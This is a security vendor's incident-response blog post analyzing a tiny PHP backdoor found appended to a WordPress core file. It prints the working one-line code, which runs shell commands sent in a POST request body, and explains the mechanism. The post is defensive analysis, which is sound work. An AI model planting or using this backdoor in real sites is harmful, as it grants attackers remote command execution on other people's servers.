Backdoor abusing of PHP tricks

  • October 24, 2016
Labs Note

During an incident response process, we found a very interesting malicious code abusing some PHP tricks. Attackers placed the malware at the end of a WordPress core file ‘./wp-includes/pomo/entry.php’:

$data=file_get_contents("php://input");echo`$data`;

Although a very small code, the snippet above can actually be a powerful backdoor if shell_exec is enabled on the server. Let’s analyze its two steps for remote code execution:

$data=file_get_contents("php://input");

This part is a known way for backdoors to get data from a POST request. The PHP documentation explains what that php://input stands for:

php://input is a read-only stream that allows you to read raw data from the request body. 
In the case of POST requests, it is preferable to use php://input instead of $HTTP_RAW_POST_DATA 
as it does not depend on special php.ini directives. 
Moreover, for those cases where $HTTP_RAW_POST_DATA is not populated by default, it is a 
potentially less memory intensive alternative to activating always_populate_raw_post_data. 
php://input is not available with enctype="multipart/form-data".

Once we assign a value to the $data variable, we can now take a closer look on the second step:

echo`$data`;

The main detail here is the use of backticks (they’re not single quotes!), which have a special purpose on such php code. See what PHP documentation says about them:

PHP supports one execution operator: backticks (``). Note that these are not single-quotes! 
PHP will attempt to execute the contents of the backticks as a shell command; 
the output will be returned (i.e., it won't simply be dumped to output; 
it can be assigned to a variable). 
Use of the backtick operator is identical to shell_exec().

So in that last part of the code, we’ll have the command stored in $data executed like shell_exec($data) before it’s echo’ed. Using this method, attackers can execute arbitrary remote commands into the system and reinfect it while the code is still active.

As the malware was inserted into a WordPress core file, this could have been easily detected by the file integrity monitoring system in our Sucuri Scanner WordPress Plugin and addressed very quickly. We also recommend keeping regular backups just in case you need to revert your website to an earlier clean stage.

If you need professional assistance on cleaning up malware and backdoors, please let us know, we would be happy to help you.

Fernando Barbosa is a Sucuri's Software Development Manager who joined the company in 2012. Fernando's main responsibilities include leading Sucuri's backend teams and engineering solutions for our suite of security products. His professional experience also covers five years of malware analysis and incident response. When Fernando isn't working, you might find him having good times with his family. Connect with Fernando on Twitter.

Related Tags
Related Categories
You May Also Like